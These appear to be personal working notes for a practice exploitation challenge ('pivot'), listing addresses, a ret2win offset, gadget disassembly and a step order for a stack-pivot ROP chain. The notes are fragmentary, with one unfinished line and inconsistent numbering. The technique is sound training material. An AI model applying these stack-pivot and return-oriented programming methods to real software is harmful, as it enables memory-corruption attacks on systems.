x86_64/pivot/gadgets


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

Goal is to call ret2win from libpivot
we don't know where ret2win is, but we do know where foothold_function is

pivot is at 0x7f2041e78f10
0x0000000000400720 : foothold_function@plt
0x000000000000096a : foothold_function

resolve ret2win:
1:  resolve foothold_function
    resolved foothold: [0x400720 + 0x20091a]
    offset of foothold vs 

2: ret2win = [0x400720 + 0x20091a] + 279 

64 rop chains possible at 0x7eff3d368f10
6 rop chains possible at buffer overflow

0x00000000004007c8 : pop rbp ; ret
0x00000000004007c1 : jmp rax

00000000004009bb <usefulGadgets>:
  4009bb:	58                   	pop    rax
  4009bc:	c3                   	ret    

  4009bd:	48 94                	xchg   rsp,rax
  4009bf:	c3                   	ret    

  4009c0:	48 8b 00             	mov    rax,QWORD PTR [rax]
  4009c3:	c3                   	ret    

  4009c4:	48 01 e8             	add    rax,rbp
  4009c7:	c3                   	ret    

1: resolve foothold (2)
4: pop rax (rax is 0x400720 + 0x20091a)
5: pop rbp (rpb is 279)
6: add rax, rbp
7: mov rax, [rax]
8: jmp rax


2: pop rax          (4)
3: xchg rsp,rax     (5)